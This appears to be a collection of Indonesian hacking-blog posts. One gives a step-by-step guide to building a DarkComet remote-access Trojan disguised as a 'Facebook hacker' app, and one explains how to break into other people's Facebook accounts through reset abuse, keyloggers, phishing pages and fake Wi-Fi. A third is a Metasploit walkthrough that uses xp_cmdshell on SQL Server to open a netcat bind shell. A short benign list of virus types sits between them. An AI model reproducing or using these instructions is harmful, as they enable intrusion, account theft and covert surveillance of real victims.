Monday 28 May 2018

cara buat virus mematikan TROJAN HOURSE

Cara Membuat virus Trojan hourse

Hasil gambar untuk trojan horse hack

Apa itu Malware?


Ini adalah program yang dimaksudkan untuk tujuan jahat. Trojan horse adalah jenis malware yang setelah diinstal di PC Anda dapat mengakses semuanya.
Biarkan saya memberi Anda sebuah contoh misalkan Anda sudah mendapat email dari teman Anda yang memberi tahu Anda untuk mengunduh aplikasi yang tampaknya sangat berguna dan Anda menginstalnya. Setelah Anda menginstal aplikasi itu, orang yang mengirimkannya kepada Anda akan memiliki akses penuh ke komputer Anda menggunakan Kuda Troya. Dia dapat melihat apa pun di PC Anda, buka file apa saja, selain itu ia juga memiliki akses ke webcam Anda yang saya yakini menakutkan!
Ada perbedaan antara Trojan Horse dan Virus. Virus menyuntikkan file / sistem untuk membuatnya tidak dapat digunakan, Ini tidak dapat membuat salinan dirinya sendiri. Di sisi lain Trojan Horse mendapatkan akses jarak jauh ke administrasi, Trojan Horse setelah menginstal semua file PC Anda dapat diakses oleh penyerang.Cara Membuat Kuda Troya: Langkah-LangkahJenis Trojan Horse: -

    
Perfect Keylogger: Rekam ketukan, jadi pada dasarnya semua yang Anda ketikkan akan direkam.
    
Botnets: Ini adalah jaringan Trojan Horse. Ini digunakan untuk mengontrol atau mencuri data dari banyak perangkat.
    
Spyware: Merekam hal-hal seperti penekanan tombol, audio, webcam, layar, log browser.
Itu adalah pengenalan dasar tentang Trojan Horse. Trojan Horse dapat dibuat menggunakan bahasa pemrograman tetapi perangkat lunak RAT dapat digunakan untuk membuat Trojan Horse tanpa coding. salah satu perangkat lunak RAT seperti DARK COMET. Ada Trojan Horse lainnya juga seperti yang terkenal adalah binatang, gerbang maya, pacar dll.
Sekarang saya akan menunjukkan kepada Anda Bagaimana cara membuat Trojan Horse dengan bantuan alat yang sangat user friendly DARK COMET dan juga bagaimana melindungi diri Anda dari hal-hal ini.

Langkah 1: Unduh SOFTWARE

Pertama-tama Anda perlu mengunduh DARK COMET dari internet. extrack file zip dan instal DARK COMET pada PC Anda. Setelah instalasi yang berhasil, Anda akan dapat melihat ikon di desktop Anda seperti yang Anda lihat di sini di screenshot


langkah 2: Mode Editor Lengkap

Klik dua kali pada DARK COMET. Menerima syarat dan ketentuan. Layar akan muncul di kiri atas layar Anda akan melihat
 opsi "RAT COMET" Klik di atasnya dan kemudian pilih modul server dan klik pada editor lengkap seperti yang ditunjukkan di sini di screenshot ini. Sekarang Anda diatur untuk membuat Trojan Horse

Langkah 3: Mengkonfigurasi TROJAN HOURSE

Setelah mengklik editor lengkap, Anda akan mendapatkan semua opsi yang terdaftar dengan cara yang ramah pengguna. Anda dapat memilih pesan apa yang akan muncul ketika korban Anda akan mengklik ikon maka Anda juga dapat memilih opsi seperti menonaktifkan firewall, pilih proses persisten (jika terbunuh maka akan kembali), Anda dapat memilih ikon Anda dan ada banyak hal untuk pilih sesuai dengan kebutuhan Anda


Tapi satu hal yang harus Anda jaga adalah dalam hal ini kami membuat koneksi terbalik. kita harus menulis alamat IP dan nomor port kita sehingga alih-alih penyerang terhubung ke korban, korban terhubung dengan penyerang. Hal ini dikenal sebagai penerusan Port.
Di sisi kanan akan ada opsi yang disebut pengaturan jaringan. Ada ketik alamat IP Anda dan ubah nomor port menjadi 999 seperti DARK COMET dengarkan di port 999.Jika Anda tidak tahu cara mengetahui alamat ip. karena kebanyakan orang menggunakan sistem operasi windows yang perlu Anda lakukan adalah membuka command prompt Anda dan ketik ‘ipconfig‘ dan tekan enter, alamat IP Anda akan ditampilkan pada prompt perintah. Jadi Kuda Troya Anda sekarang sudah terkonfigurasi sepenuhnya.



Langkah 4: Menguji TROJAN HOURSE
Setelah Anda menyelesaikan semua ini cukup klik pada membangun barang dan Trojan Horse Anda akan dibuat. Di sini saya telah membuat Trojan Horse yang disebut hacker Facebook, Anda dapat mencoba jika ikon Anda berfungsi dengan baik atau tidak dalam sistem operasi paralel melalui VMware Virtualization. Anda perlu beberapa teknik rekayasa sosial sehingga korban Anda yakin bahwa itu adalah aplikasi yang berguna dan mereka harus menginstalnya di PC mereka. Begitu korban Anda mengklik dua kali pada ikon ini, Anda akan mendapatkan akses lengkap ke PC korban Anda. Sekarang Anda bisa mengacaukan PC mereka.



Lindungi Diri Anda Dari Trojan Horse: -
Di sini saya telah mencantumkan beberapa alat yang membantu melindungi Anda dari Kuda Trojan yang tersedia di internet.

    
KEY SCRAMBLER: Ini melindungi dari key-logger dengan mengenkripsi semua yang Anda ketik di kernel.
    
SANDBOXIE: Ini menjalankan program Anda pada ruang yang terisolasi sehingga tidak mempengaruhi seluruh sistem. Ini juga mencegah mereka membuat perubahan permanen dalam sistem.
    
FIREWALL: Melindungi Anda dari akses tidak sah dari jaringan. Ini mengontrol lalu lintas masuk dan keluar.
    
ZONEALARM: Ini adalah firewall yang melindungi Anda dari gangguan dan ancaman online.
Di beberapa pasar gelap internet Trojan Horse yang tidak terdeteksi juga dijual. Trojan Horse dapat menjadi teman terbaik untuk peretas dan Trojan Horse telah memainkan peran yang sangat penting dalam kehidupan banyak profesional keamanan TI. Untuk membangun Trojan Horse yang tidak terdeteksi, Anda hanya perlu mengetahui satu bahasa pemrograman.
Salah satu Trojan Horse banking yang paling berbahaya adalah ZEUS yang menghancurkan kehidupan banyak orang. ZEUS Trojan Horse adalah salah satu Trojan Horse yang tidak terdeteksi dan meretas banyak komputer. Trojan Horse ini meretas sekitar 74.000 akun FTP dan juga situs web seperti Oracle, NASA, Bank of the Trojan Horse. Amerika dll
Jika Anda menyukai panduan, maka bagikan di antara teman-teman Anda dan jika Anda memiliki keraguan atau saran, maka Anda dapat memberi komentar kami di bawah ini.Saya tidak akan bertanggung jawab atas segala jenis aktivitas kriminal yang dilakukan dengan menggunakan panduan ini. Panduan ini hanya untuk tujuan informasi.

9 Jenis Virus Komputer Yang Harus Anda Ketahui - Dan Cara Menghindari Mereka

9 Jenis Virus Komputer Yang Harus Anda Ketahui - Dan Cara Menghindari Mereka


Hasil gambar untuk virus komputer

Menjadi penerima jangka panjang dari mereka sendiri, saya dapat mengatakan dengan pasti bahwa setiap orang dari kita benci berada di ujung penerima virus. Sementara infeksi yang mereka sebabkan ke komputer kita dan file-file yang mereka ganggu dapat dihitung, satu hal yang di luar pemahaman adalah tekanan mental yang ditimbulkannya.
Namun, terlepas dari faktor-faktor tersebut, hanya sebagian kecil dari kita yang ingin melihat sisi lain dari gambar. Namun, berkat para peneliti yang telah menghabiskan banyak waktu di bidang ini, orang-orang seperti saya sekarang dapat setuju tentang pemrograman virus ini, bersama dengan mekanisme transmisi dan kerusakan yang menyebabkan kemampuan.
Bahkan jika Anda termasuk dalam kelompok pengguna Komputer yang berpikir bahwa belajar tentang virus komputer tidak sepadan dengan waktu Anda - karena Anda menyerahkannya ke antivirus Anda seperti Soft2Secure untuk menghapus ransomware, izinkan saya meyakinkan Anda bahwa ada beberapa virus yang melewati keamanan sistem perangkat Anda. Jadi, jika Anda ingin tahu apa yang harus dilakukan ketika situasi seperti itu muncul, baca terus karena kami memiliki beberapa tips yang sangat berguna untuk Anda.
Berikut adalah 9 Virus Komputer yang harus Anda ketahui :

# secara garis besar


1. Boot Sector Virus.
Meskipun virus ini telah menjadi usang, virus ini masih muncul dengan satu atau lain cara. Virus ini mendapat perhatian ketika floppy disk digunakan untuk mem-boot komputer. Di komputer modern, virus ini bisa muncul di "Master Boot Record". Dalam perangkat penyimpanan yang dipartisi komputer Anda, ini adalah sektor pertama yang terjadi.
Namun, berkat evolusi fakta Internet, ancaman virus ini sekarang dikurangi.

2. Virus Scripting Web.
Serupa dengan hyperlink yang kami gunakan di Microsoft Word, banyak situs web yang menggunakan kode untuk menyediakan konten yang menarik bagi penggunanya. Misalnya, karena tren menonton video online kini menjadi sangat populer - lebih dari 2 Miliar Video dialirkan di Facebook setiap hari, video ini juga mengeksekusi kode tertentu.
Kode-kode ini dapat dieksploitasi dan sangat merepotkan untuk dicatat bahwa eksploitasi ini telah terjadi di beberapa situs yang sangat penting. Semua peretas harus melakukannya untuk meninggalkan komentar di Bagian Komentar di situs web yang berisi kode itu. Jadi, bahkan tanpa Webmaster yang mengetahuinya, kode itu akan dimasukkan ke dalam situs.
3. Pembajak Browser.
Pernah menghadapi masalah di mana beranda laman web Anda diarahkan secara otomatis ke situs tertentu? Nah, itulah cara paling umum yang digunakan ransomware ini untuk membajak browser Anda.
Meskipun efek visualnya mungkin melambangkan ancaman, pembajak ini tidak lebih dari taktik untuk meningkatkan penghasilan dari iklan web. Namun, jika Anda masih ingin membersihkan komputer Anda dari virus ini, berikan Soft2Secure a go.

4. Resident Virus.
Setelah memasukkan dirinya sendiri ke dalam memori sistem Anda, virus ini memiliki kemampuan untuk mengambil sejumlah tindakan. Salah satu fitur yang lebih merepotkan adalah kemampuannya untuk melarikan diri. Meninggalkan file yang semula terinfeksi, virus ini memiliki kemampuan untuk berjalan sendiri.

5. Virus Tindakan Langsung.
Mirip dengan virus Wina yang mengejutkan komputer pada tahun 1998, virus ini mulai bekerja setelah Anda menjalankan file tersebut. Muatan dikirimkan ke komputer Anda dan virus menjadi aktif.
Namun, virus ini memiliki batasan. Tidak ada tindakan kecuali file yang terinfeksi diimplementasikan lagi.

6. Virus Polimorfik.
Salah satu faktor yang melambangkan kegunaan dari virus ini adalah kemampuannya untuk menghindar. Program Antivirus yang diaktifkan di komputer kami mendeteksi keberadaan virus apa pun dengan mendeteksi kodenya.
Virus polimorfik telah mengeksploitasi keterbatasan ini dengan indah karena ia mengubah kode setiap kali file yang terinfeksi dijalankan. Dengan demikian, hampir tidak mungkin bagi antivirus biasa untuk melacaknya.

7. Virus File Infector.

Meskipun kata "file" dalam namanya mungkin menunjukkan sebaliknya, virus ini tidak mengambil bantuan file setiap saat. Faktanya, file tersebut hanya titik awal ketika infector file mengerdilkan file pertama setelah itu menulis ulang file.

8. Virus Multipartit.
Jika Anda telah membaca dengan seksama virus-virus yang disebutkan di atas, Anda mungkin telah memperhatikan bahwa mereka menggunakan dua metode untuk transmisi mereka. Entah mereka menggunakan satu metode atau satu payload tunggal dikirimkan.
Namun, virus ini ingin mengklaim keduanya. Tergantung pada sistem operasi komputer Anda atau file yang ada di komputer Anda, itu mungkin menggunakan salah satu dari dua metode untuk menyebar.

9. Virus Makro.Muncul dalam bentuk dokumen kata yang tampaknya menghubungkan pengguna ke situs web pornografi, Melissa adalah salah satu Virus Mikro yang paling dikenal. Selangkah lebih maju, virus ini tidak hanya mengeksploitasi pengguna tetapi juga teman-temannya dengan mengirimkan salinan dokumen virus yang terinfeksi ke daftar kontak.
Jika Anda merasa bahwa Anda mengetahui jenis virus lain yang signifikan, jangan ragu untuk memberi tahu kami di bagian komentar.

Sunday 27 May 2018

4 Cara Meretas Kata Sandi Facebook

4 Cara Meretas Kata Sandi Facebook & Cara Melindungi Diri dari Mereka


Meskipun kekhawatiran keamanan telah mengganggu Facebook selama bertahun-tahun, kebanyakan orang tetap bertahan dan anggota baru terus bergabung. Ini telah menyebabkan Facebook memecahkan angka rekor dengan lebih dari 1,94 miliar pengguna aktif bulanan, per Maret 2017 - dan sekitar 1,28 miliar pengguna aktif harian.

Kami berbagi kehidupan kami di Facebook. Kami membagikan ulang tahun dan hari jadi kami. Kami berbagi rencana dan lokasi liburan kami. Kami berbagi kelahiran putra-putra kami dan kematian ayah kami. Kami berbagi momen paling berharga dan pikiran kami yang paling menyakitkan. Kami mengungkapkan setiap aspek kehidupan kita. Psikolog klinis telah menulis seluruh buku yang memerinci dampak yang sangat luas yang dimiliki Facebook pada emosi dan hubungan kita

Tapi terkadang kita lupa siapa yang melihat.

Kami menggunakan Facebook sebagai alat untuk terhubung, tetapi ada orang-orang yang menggunakan konektivitas itu untuk tujuan jahat. Kami mengungkapkan apa yang orang lain dapat gunakan untuk melawan kami. Mereka tahu ketika kita tidak di rumah dan untuk berapa lama kita pergi. Mereka tahu jawaban atas pertanyaan keamanan kami. Orang praktis dapat mencuri identitas kami - dan itu hanya dengan informasi yang terlihat kami sengaja memberikan melalui profil Facebook publik kami.

Bagian yang paling menakutkan adalah saat kita merasa lebih nyaman dengan kemajuan teknologi, kita sebenarnya menjadi lebih rentan terhadap peretasan. Seolah-olah kami belum melakukan cukup banyak untuk membantu para peretas dalam pencarian mereka untuk data kami dengan berbagi secara publik, mereka yang tahu bisa masuk ke email kami dan akun Facebook untuk mencuri setiap bagian lain dari kehidupan kami yang kami maksudkan agar tidak mengganggu. mata.
Bahkan, Anda bahkan tidak perlu menjadi peretas profesional untuk masuk ke akun Facebook seseorang.
Itu bisa semudah menjalankan Firesheep di komputer Anda selama beberapa menit. Bahkan, Facebook benar-benar memungkinkan orang untuk masuk ke akun Facebook orang lain tanpa mengetahui kata sandinya. Yang harus Anda lakukan adalah memilih tiga teman untuk mengirim kode ke. Anda mengetikkan tiga kode, dan voila - Anda masuk ke akun. Semudah itu.
Dalam artikel ini saya akan menunjukkan ini kepada Anda, dan beberapa cara lain yang dapat digunakan peretas (dan bahkan orang biasa) untuk meretas akun Facebook seseorang. Tapi jangan khawatir, saya juga akan menunjukkan cara mencegahnya terjadi pada Anda.

BERIKUT 4 METODE PERETASAN FACEBOOK

Metode 1 Reset kata sandi
Cara termudah untuk "meretas" Facebook seseorang adalah dengan mengatur ulang kata sandi. Ini bisa lebih mudah dilakukan oleh orang-orang yang berteman dengan orang yang mereka coba hack.

    
Langkah pertama adalah mendapatkan login email Facebook teman Anda. Jika Anda belum mengetahuinya, coba cari di halaman Facebook mereka di bagian Info Kontak. Masih terjebak? Peretas menggunakan alat penggaruk seperti TheHarvester untuk menambang untuk alamat email, jadi lihat panduan kami di sini untuk menemukan email pengguna yang belum Anda ketahui.
    
Selanjutnya, klik Lupa kata sandi Anda? dan ketik email korban. Akun mereka harus muncul. Klik Ini akun saya.
    
Ini akan menanyakan apakah Anda ingin mengatur ulang kata sandi melalui email korban. Ini tidak membantu, jadi tekan Tidak lagi memiliki akses ke ini?
    
Sekarang akan bertanya Bagaimana kita bisa menghubungi Anda? Ketik email yang Anda miliki yang juga tidak terkait dengan akun Facebook lainnya.
    
Sekarang akan mengajukan pertanyaan. Jika Anda berteman dekat dengan korban, itu bagus. Jika Anda tidak tahu banyak tentang mereka, buatlah tebakan yang terpelajar. Jika Anda mengetahuinya, Anda dapat mengubah kata sandi. Sekarang Anda harus menunggu 24 jam untuk masuk ke akun mereka.
    
Jika Anda tidak menemukan pertanyaan, Anda dapat mengklik Pulihkan akun Anda dengan bantuan dari teman. Ini memungkinkan Anda memilih antara tiga dan lima teman.
https://img.wonderhowto.com/img/original/64/79/63491552940204/0/634915529402046479.jpg
Ini akan mengirimi mereka kata sandi, yang mungkin Anda minta, lalu ketikkan ke halaman berikutnya. Anda dapat membuat tiga hingga lima akun Facebook palsu dan menambahkan teman Anda (terutama jika mereka hanya menambahkan seseorang), atau Anda dapat memilih tiga hingga lima teman dekat Anda yang bersedia memberi Anda kata sandi
Cara Melindungi Diri Anda

     Gunakan alamat email khusus untuk Facebook Anda dan jangan masukkan alamat email itu di profil Anda.
     Ketika memilih pertanyaan dan jawaban keamanan, buatlah menjadi sulit. Buatlah agar tidak ada yang bisa mengetahuinya dengan hanya melalui Facebook Anda. Tidak ada nama hewan peliharaan, tidak ada hari jadi - bahkan nama guru kelas tiga. Ini semudah melihat melalui buku tahunan.
     Pelajari tentang memulihkan akun Anda dari teman. Anda dapat memilih tiga teman yang Anda inginkan untuk memasukkan kata sandi. Dengan cara itu Anda dapat melindungi diri sendiri dari teman dan teman-teman bersama lainnya yang bersinggungan dengan Anda untuk masuk ke akun Anda.

Metode 2 Gunakan keylogger

Software keylogger

Software keylogger adalah program yang dapat merekam setiap stroke pada keyboard yang dibuat pengguna, paling sering tanpa sepengetahuan mereka. Perangkat lunak harus diunduh secara manual di komputer korban. Ini akan secara otomatis mulai menangkap penekanan tombol segera setelah komputer dihidupkan dan tetap tidak terdeteksi di latar belakang. Perangkat lunak ini dapat diprogram untuk mengirimkan ringkasan semua penekanan tombol melalui email.

SAYA memiliki panduan yang sangat baik tentang cara mendapatkan keylogger pada komputer target untuk memulai. Jika ini bukan yang Anda cari, Anda dapat mencari keyloggers gratis atau mencoba mengkodekan keylogger dasar sendiri di C ++.

https://img.wonderhowto.com/img/original/29/09/63491553875660/0/634915538756602909.jpg
Hardware keylogger
Ini bekerja dengan cara yang sama seperti keylogger perangkat lunak, kecuali bahwa drive USB dengan perangkat lunak harus terhubung ke komputer korban. Drive USB akan menyimpan ringkasan penekanan tombol, jadi semudah menyambungkannya ke komputer Anda sendiri dan mengekstraksi datanya.

Ada beberapa opsi yang tersedia untuk keyloggers perangkat keras. Keylogger kabel seperti Keyllama dapat dilampirkan ke komputer korban untuk menyimpan penekanan tombol dan berfungsi pada semua sistem operasi - asalkan Anda memiliki akses fisik untuk mengambil perangkat nanti. Jika Anda ingin menggeser kata sandi dari jarak jauh, Anda dapat berinvestasi dalam keylogger premium Wi-Fi diaktifkan yang dapat mengirim email keystroke yang diambil atau diakses dari jarak jauh melalui Wi-Fi.

https://img.wonderhowto.com/img/original/22/50/63491553951991/0/634915539519912250.jpg

Cara Melindungi Diri Anda

     Gunakan firewall. Keylogger biasanya mengirim informasi melalui internet, jadi firewall akan memonitor aktivitas online komputer Anda dan mengendus apa pun yang mencurigakan.
     Instal pengelola kata sandi. Keylogger tidak dapat mencuri apa yang tidak Anda ketikkan. Pembuat kata sandi secara otomatis mengisi formulir-formulir penting tanpa Anda harus mengetikkan sesuatu.
     Perbarui perangkat lunak Anda. Setelah sebuah perusahaan mengetahui eksploit apa pun dalam perangkat lunak mereka, mereka bekerja pada pembaruan. Tetap di belakang dan Anda bisa menjadi rentan.
     Ubah kata sandi. Jika Anda masih merasa tidak terlindungi, Anda dapat mengubah kata sandi dua kali seminggu. Ini mungkin tampak drastis, tetapi itu membuat informasi apa pun yang diretas oleh hacker tidak berguna.


Metode 3 Phishing

Opsi ini jauh lebih sulit daripada yang lain, tetapi ini juga merupakan metode paling umum untuk meretas akun seseorang. Jenis phishing yang paling populer adalah membuat halaman login palsu. Halaman ini dapat dikirim melalui email ke korban Anda dan akan terlihat persis seperti halaman login Facebook. Jika korban masuk, informasi akan dikirimkan kepada Anda bukan ke Facebook. Proses ini sulit karena Anda perlu membuat akun web hosting dan halaman login palsu.
Metode 3 Phishing

Opsi ini jauh lebih sulit daripada yang lain, tetapi ini juga merupakan metode paling umum untuk meretas akun seseorang. Jenis phishing yang paling populer adalah membuat halaman login palsu. Halaman ini dapat dikirim melalui email ke korban Anda dan akan terlihat persis seperti halaman login Facebook. Jika korban masuk, informasi akan dikirimkan kepada Anda bukan ke Facebook. Proses ini sulit karena Anda perlu membuat akun web hosting dan halaman login palsu.
Cara termudah untuk melakukannya adalah dengan mengikuti panduan kami tentang cara mengkloning situs web untuk membuat salinan persis dari halaman login facebook. Maka Anda hanya perlu men-tweak formulir kirim untuk menyalin / menyimpan / mengirim surel rincian masuk yang dimasukkan korban. Jika Anda memerlukan bantuan dengan langkah-langkah yang tepat, ada petunjuk rinci yang tersedia oleh Alex Long di sini di Null Byte. Pengguna kini sangat berhati-hati dengan masuk ke Facebook melalui tautan lain, dan filter phishing email menjadi lebih baik setiap hari, sehingga hanya menambah proses yang sudah sulit ini. Tapi, itu masih mungkin, terutama jika Anda mengkloning seluruh situs web Facebook.


Cara Melindungi Diri Anda

    
Jangan klik tautan melalui email. Jika sebuah email memberitahu Anda untuk masuk ke Facebook melalui tautan, berhati-hatilah. Pertama, periksa URL (Ini panduan hebat tentang apa yang harus diwaspadai). Jika Anda masih ragu, langsung kunjungi situs web utama dan masuk seperti biasa.
    
Phishing tidak hanya dilakukan melalui email. Ini dapat berupa tautan apa pun di situs web / ruang obrolan / pesan teks / dll. Bahkan iklan yang muncul dapat berbahaya. Jangan klik pada tautan yang tampak samar yang meminta informasi Anda.
    
Gunakan perangkat lunak anti-virus & keamanan web, seperti Norton atau McAfee.

Method 4 Man in the Middle Attack

Jika Anda bisa mendekati target Anda, Anda dapat mengelabui mereka agar terhubung ke jaringan Wi-Fi palsu untuk mencuri kredensial melalui serangan Man In The Middle (MITM). Alat seperti Wi-Fi Pumpkin membuat jaringan Wi-Fi palsu semudah memasang Adapter Jaringan Nirkabel $ 16 pada Raspberry Pi $ 35 dan semakin dekat dengan target Anda. Setelah korban terhubung ke jaringan palsu Anda, Anda dapat memeriksa lalu lintas atau mengarahkannya ke halaman login palsu. Anda bahkan dapat mengaturnya untuk hanya mengganti halaman tertentu dan meninggalkan halaman lain sendiriaN.


Cara Melindungi Diri Anda

    
Jangan terhubung ke Jaringan Wi-Fi terbuka (tidak terenkripsi) apa pun.
    
Terutama jangan sambungkan ke jaringan Wi-Fi apa pun yang tidak pada tempatnya. Mengapa Anda melihat "Google Starbucks" ketika tidak ada Starbucks untuk bermil-mil? Karena peretas tahu ponsel atau komputer Anda akan secara otomatis terhubung dengannya jika Anda telah menggunakan jaringan dengan nama yang sama sebelumnya.
    
Jika Anda kesulitan menghubungkan ke Wi-Fi Anda, lihat daftar jaringan terdekat untuk melihat apakah ada salinan nama jaringan Anda di dekatnya.
    
Jika router Anda meminta Anda memasukkan kata sandi untuk pembaruan firmware untuk mengaktifkan internet atau menampilkan halaman dengan kesalahan ejaan atau tata bahasa utama, kemungkinan Anda terhubung ke hotspot palsu dan seseorang di sekitar Anda mencoba mencuri kredensial Anda.
Pasangan Lebih Banyak Peretasan Facebook
Bagi mereka yang memiliki sedikit lebih banyak keahlian teknis, periksa hack Facebook Kebijakan yang Sama dan yang lebih mudah, Facebook Password Extractor. Kami akan terus menambahkan lebih banyak peretasan Facebook dalam waktu dekat, jadi teruslah kembali ke sini.Cara Melindungi Diri Anda

    
Di Facebook, buka Pengaturan Akun Anda dan periksa di bawah Keamanan. Pastikan Penjelajahan Aman diaktifkan. Firesheep tidak dapat mengendus cookie melalui koneksi terenkripsi seperti HTTPS, jadi cobalah untuk menghindari HTTP.
    
SSL penuh waktu. Gunakan Firefox add-ons seperti HTTPS-Everywhere atau Force-TLS.
    
Keluar dari situs web setelah selesai. Firesheep tidak dapat tetap masuk ke akun Anda jika Anda logoff.
    
Gunakan hanya jaringan Wi-Fi yang dapat dipercaya. Seorang hacker dapat duduk di hadapan Anda di Starbucks dan melihat melalui email Anda tanpa Anda sadari.
    
Gunakan VPN. Ini melindungi terhadap setiap sidejacking dari jaringan WiFi yang sama, tidak peduli situs web apa yang Anda gunakan karena semua lalu lintas jaringan Anda akan dienkripsi sepanjang jalan ke penyedia VPN Anda.
Melindungi Diri Anda: Kurang Lebih
Situs jejaring sosial adalah cara hebat untuk tetap terhubung dengan teman lama dan bertemu dengan orang baru. Membuat acara, mengirim ucapan selamat ulang tahun dan memberi tahu orang tua bahwa Anda mencintai mereka semua hanya dengan beberapa klik saja.
Facebook bukanlah sesuatu yang perlu Anda hindari, tetapi Anda perlu menyadari lingkungan Anda dan membuat keputusan cerdas tentang apa yang Anda kenakan di profil Anda. Semakin sedikit informasi yang Anda berikan di Facebook untuk dilihat semua orang, semakin sulit Anda membuatnya untuk para peretas.
Jika akun Facebook Anda diretas, periksa panduan kami untuk mengembalikan akun Facebook Anda yang diretas untuk mendapatkan informasi tentang memulihkan akun Anda.
Bonus: Jika Anda tertarik pada siapa yang memeriksa Anda, ada beberapa cara yang dapat Anda lakukan (semacam) melacak siapa yang melihat profil Facebook Anda.Panduan Peretasan Kata Sandi
Untuk info lebih lanjut tentang pemecahan sandi, lihat panduan kami tentang meretas kata sandi Linux, meretas kata sandi Windows, dan panduan pemula super-mudah kami tentang meretas kata sandi Wi-Fi (atau untuk router nirkabel yang lebih baru, cara meretas kata sandi wifi WPA2-PSK).


SEKIAN ARTIKEL DARI SAYA DAN SALAM "HACKERINDO"

CARA HACK WEBSITE CMD

CARA HACK WEBSITE Perintah CMD dari MS Server SQL Online

Hasil gambar untuk cmd hack

Selamat datang kembali, BLOG TUTORIAL HACKING


Ada banyak cara untuk meretas basis data, dan sebagian besar teknik ini memerlukan injeksi SQL (SQLi), yang merupakan cara mengirim perintah SQL kembali ke database dari formulir web atau masukan lain. Dalam tutorial ini, kita akan menggunakan injeksi SQL untuk mendapatkan akses ke server yang mendasarinya. Jadi daripada mendapatkan akses ke database dan datanya, kami akan menggunakan database sebagai perantara untuk mendapatkan akses ke server yang mendasarinya.

Hampir semua database komersial — MS SQL Server, Oracle, MySQL, DB2, dll. —memiliki prosedur tersimpan di dalam sistem (SP). Ini adalah kode yang disediakan oleh pengembang untuk membantu administrator sistem menyelesaikan tugas-tugas umum.

Seringkali, admin sistem dari suatu basis data akan memerlukan akses ke server yang mendasarinya, jadi Microsoft menyediakan SP yang disebut xp_cmdshell pada SQL Server mereka. Ketika sistem admin mengeksekusi SP ini, mereka mendapatkan prompt perintah pada server yang mendasari yang menjadi tuan rumah database.

SP ini pernah diaktifkan secara default pada semua instalasi Microsoft SQL Server, tetapi karena dieksploitasi oleh peretas begitu sering, Microsoft telah menonaktifkannya secara default — tetapi kita masih dapat mengaksesnya dan membuat kekacauan!

Tentu saja, untuk mengakses SP ini dari jarak jauh, kita memerlukan kredensial login dari admin sistem. Secara default, Microsoft memaketkan SQL Server mereka dengan akun administrator sistem bernama "sa" dan beberapa admin sistem mengubahnya. Anda dapat menggunakan alat seperti SQLdict atau modul bantu Metasploit sendiri, sql_login, untuk mendapatkan kata sandi dan menggunakannya dalam peretasan ini.

Jika kita dapat menjalankan perintah CMD pada sistem korban, kita tidak bisa hanya menjalankan pengintaian di atasnya, tetapi kita juga bisa memilikinya dengan pengetahuan yang cukup tentang sistem dan pengetahuan tentang perintah Windows.

Langkah 1Buka Terminal
Untuk memulai, seperti biasa, jalankan Kali dan buka terminal.

Langkah 2 Buka Metasploit
Mari kita mulai konsol Metasploit dengan mengetik:

kali> msfconsole

Ini akan membuka konsol yang terlihat mirip dengan ini.

Langkah 3 Muat Modul Auxiliary
Sekarang, kita perlu memuat modul tambahan msql_exec.

msf> gunakan auxiliary / admin / mssql / mssql_exec


Sekarang setelah kami memuat modul, mari kita lihat halaman info untuk itu. Mengetik:

msf> info

Seperti yang Anda lihat di bawah ini, kami memiliki beberapa variabel kunci yang harus kami tetapkan termasuk CMD, RHOST, dan PASSWORD.


Dalam hal ini, saya mengatur RHOST ke IP server database, PASSWORD ke kata sandi akun "sa" yang saya crack sebelumnya (nullbyte), dan perintah yang ingin saya jalankan pada shell perintah di server, dalam hal ini , 'dir' untuk mendapatkan daftar direktori. Pastikan bahwa perintahnya ada di antara tanda kutip tunggal.


Ketika variabel-variabel ini telah ditetapkan, cukup ketik "run."

msf> jalankan

Modul ini akan mengakses prosedur tersimpan xp_cmdshell, meskipun dinonaktifkan, dan mengembalikan hasil perintah

Seperti yang Anda lihat, perintah ini telah dikirim ke xp_cmdshell dan mengeksekusi dir pada server yang mendasarinya. Outputnya adalah daftar direktori dari direktori C: \ WINDOWS \ system32.

Langkah 4Gunakan SP untuk Pengintaian
Untuk melakukan sedikit pengintaian di server ini, kami dapat mengirim "netstat" ke server untuk melihat semua koneksi ke sistem.

msf > set CMD 'netstat'

msf > run


Langkah 5  Kirim Beberapa Perintah
Mengirimkan perintah tunggal semuanya baik dan bagus, tetapi tidak ada banyak tindakan signifikan yang dapat kita lakukan dengan satu perintah dengan pengecualian mungkin penghapusan file (del). Kita dapat mengirim beberapa perintah hanya dengan meletakkan "&" di antara perintah, seperti:

msf > set CMD 'cd \ & dir'
Sekarang, ketika kita menjalankan modul ini, harus mengubah direktori ke direktori root pada mesin Windows (C :) dan kemudian lakukan daftar direktori.



Seperti yang Anda bayangkan, kita dapat melakukan perjalanan di seluruh struktur direktori dengan cara ini untuk menemukan informasi rahasia atau kritis dan membaca atau menghapusnya.

Langkah 6 Jalankan Exe Tersembunyi. Mengajukan
Anda mungkin telah memperhatikan bahwa admin sistem pada server memiliki Netcat yang dapat dieksekusi di direktori root. Mereka mungkin meninggalkannya di sana untuk administrasi jarak jauh atau tugas lain. Sekarang kita tahu itu ada di sana, kita dapat menjalankannya dari modul ini.

msf > set CMD 'cd \ & nc -L -p6996 -e cmd.exe'

Ini akan mengubah direktori ke direktori root tempat Netcat tinggal dan kemudian membuka pendengar Netcat (-L) pada port 6996 (-p6996) dan menekan shell perintah melalui pendengar. Ayo coba....


Sepertinya itu berhasil dieksekusi. Sekarang, mari kita coba untuk terhubung ke pendengar dengan Netcat pada sistem Kali kita.

msf > ns 192.168.181.105 6996



berhasil! Kami sekarang memiliki command prompt pada sistem remote dan kami memilikinya!

Penting untuk dicatat bahwa pengetahuan tentang perintah baris perintah adalah kunci sukses dalam jenis peretasan ini. Sebagian besar tutorial kami di sini terfokus pada perintah Linux, tetapi Windows dapat dijalankan dengan sukses dari baris perintah juga, terutama dengan PowerShell. Untuk melakukannya, Anda perlu mengetahui perintah-perintah ini di Windows dan juga Linux. Bahkan registri dapat diubah dari baris perintah!

SALAM "HACKERINDO"